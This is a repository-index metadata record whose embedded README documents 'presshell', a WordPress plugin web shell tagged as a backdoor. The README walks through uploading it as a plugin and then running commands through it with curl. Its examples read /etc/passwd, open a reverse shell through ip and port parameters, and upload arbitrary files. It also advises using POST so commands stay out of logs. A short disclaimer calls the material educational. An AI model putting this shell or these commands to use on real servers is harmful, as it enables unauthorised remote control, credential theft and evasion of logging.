{"id":13844928,"url":"https://github.com/scheatkode/presshell","last_synced_at":"2025-07-12T00:32:24.010Z","repository":{"id":44724563,"uuid":"449674513","full_name":"scheatkode/presshell","owner":"scheatkode","description":"🚪 Quick \u0026 dirty Wordpress Command Execution Shell","archived":false,"fork":true,"pushed_at":"2022-01-24T21:55:11.000Z","size":107,"stargazers_count":67,"open_issues_count":0,"forks_count":9,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-08-05T17:43:26.983Z","etag":null,"topics":["backdoor","pentest","php","remote-code-execution","wordpress","wordpress-plugin"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"leonjza/wordpress-shell","license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/scheatkode.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-01-19T12:04:00.000Z","updated_at":"2024-07-12T11:11:52.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/scheatkode/presshell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/scheatkode%2Fpresshell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/scheatkode%2Fpresshell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/scheatkode%2Fpresshell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/scheatkode%2Fpresshell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/scheatkode","download_url":"https://codeload.github.com/scheatkode/presshell/tar.gz/refs/he
ads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225772808,"owners_count":17521894,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","pentest","php","remote-code-execution","wordpress","wordpress-plugin"],"created_at":"2024-08-04T17:03:03.563Z","updated_at":"2024-11-21T17:31:00.314Z","avatar_url":"https://github.com/scheatkode.png","language":"PHP","readme":"\u003cp align='center'\u003e\n   \u003cimg src='.assets/backdoor.png' alt='' width='256' /\u003e\n\u003c/p\u003e\n\n\u003ch2 align='center'\u003epresshell\u003c/h2\u003e\n\n\u003cp align='center'\u003e\u003ci\u003eQuick \u0026 dirty Wordpress Command Execution Shell.\u003c/i\u003e\u003c/p\u003e\n\nExecute shell  commands on  your wordpress  server. Uploaded  shell will\nprobably be at `\u003cyour-host\u003e/wp-content/plugins/shell/shell.php`\n\n### Installation\n\nTo install the shell, we are  assuming you have administrative rights to\nWordpress and can  install plugins since transferring a PHP  file to the\nmedia  library  shouldn't work  anyway.  Otherwise,  you have  a  bigger\nproblem.\n\nSimply upload  the zip  file located  in the Releases  section as  a new\nextension and you're good to go.\n\n### Usage\n\nUsing  the shell  is straightforward.  
Simply pass  `sh` commands  as an\nargument to the shell :\n\n```sh\n❯ curl 'http://host/.../shell.php?cmd=uname+-a'\nLinux wordpress-server 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux\n```\n\nYou may  as well pass  these arguments in a  POST request, which  is the\nrecommended way to keep your commands out of logs.\n\n```sh\n❯ curl 'http://host/.../shell.php' --data-urlencode 'cmd=ls'\nLICENSE\nREADME.md\nshell.php\n```\n\nMore complex  commands are  also supported,  careful about  your quoting\nthough.\n\n```sh\n❯ curl 'http://host/.../shell.php' --data-urlencode 'cmd=cat /etc/passwd | grep -v \"\\(false\\|nologin\\)\"'\nroot:x:0:0:root:/root:/bin/bash\nsync:x:4:65534:sync:/bin:/bin/sync\n```\n\n```sh\n❯ curl 'http://host/.../shell.php' --data-urlencode 'cmd=python -c \"from urllib.parse import urlencode; print(urlencode({\\\"cmd\\\": \\\"uname -a\\\"}))\"'\ncmd=uname+-a\n```\n\nYou can also open a reverse  shell using the `ip` and `port` parameters.\nThe default port is `443`.\n\n```sh\n❯ curl 'http://host/.../shell.php' --data-urlencode 'ip=127.0.0.1'\n```\n\n```sh\n❯ curl 'http://host/.../shell.php' --data-urlencode 'ip=127.0.0.1' --data-urlencode 'port=1337'\n```\n\nThere is also an option provided for convenience to upload a file to the\ndirectory of the plugin *unconditionally and without checks*.\n\n```sh\n❯ curl 'http://host/.../shell.php' -F 'file=@some_file'\n❯ curl 'http://host/.../shell.php' --data-urlencode 'cmd=ls'\nLICENSE\nREADME.md\nshell.php\nsome_file\n```\n\n### Disclaimer\n\nRunning unauthorized attacks against public or private servers is illegal. 
The\ncontent  of this  repository is  for  educational purposes  only and  no\nresponsibility will be  taken by the authors  in case of ill  use of the\nprovided material.\n","funding_links":[],"categories":["PHP"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fscheatkode%2Fpresshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fscheatkode%2Fpresshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fscheatkode%2Fpresshell/lists"}